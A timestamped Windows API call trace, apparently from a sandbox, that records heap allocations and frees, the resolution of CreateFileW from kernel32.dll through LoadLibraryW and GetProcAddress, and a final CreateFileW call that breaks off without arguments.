[0122.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0122.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0122.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0122.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0122.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392490 [0122.738] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0122.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392490 | out: hHeap=0x1780000) returned 1 [0122.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0122.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0122.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21c0 [0122.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0122.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0122.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0122.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0122.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0122.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2220 [0122.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0122.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0122.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0122.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2230 [0122.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0122.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0122.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0122.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c38 [0122.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0122.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0122.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0122.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0122.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0122.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0122.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0122.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0122.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0122.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0122.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0122.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0122.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0122.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0122.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0122.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0122.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0122.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0122.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0122.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0122.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0122.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0122.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0122.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0122.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0122.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0122.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0122.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0122.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0122.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0122.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0122.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0122.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0122.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0122.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0122.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0122.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0122.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0122.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0122.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0122.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0122.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0122.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0122.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0122.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0122.740] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0122.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0122.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0122.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0122.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0122.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0122.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0122.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0122.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0122.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0122.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0122.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0122.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0122.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0122.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0122.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0122.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0122.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0122.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0122.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0122.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0122.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0122.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0122.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0122.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0122.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0122.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0122.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0122.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0122.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0122.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0122.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0122.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0122.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0122.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0122.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0122.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0122.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0122.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0122.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0122.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0122.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0122.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0122.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0122.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0122.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0122.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0122.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0122.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0122.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0122.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0122.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0122.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0122.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0122.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0122.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0122.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0122.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0122.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0122.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0122.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0122.743] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0122.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0122.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0122.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0122.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0122.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0122.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0122.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0122.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0122.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0122.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0122.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0122.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0122.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0122.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0122.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0122.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0122.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0122.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0122.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0122.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0122.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0122.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0122.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0122.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0122.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0122.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0122.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0122.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0122.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0122.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0122.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0122.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0122.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0122.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0122.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0122.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0122.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0122.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0122.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0122.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0122.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0122.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0122.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0122.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0122.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0122.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0122.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0122.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0122.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0122.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0122.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0122.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0122.745] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0122.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0122.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.745] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0122.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0122.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0122.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7a8 [0122.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca7a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0122.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0122.746] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0122.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0122.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0122.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0122.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0122.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0122.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0122.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0122.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0122.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0122.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0122.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0122.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0122.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0122.746] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0122.747] CreateFileW 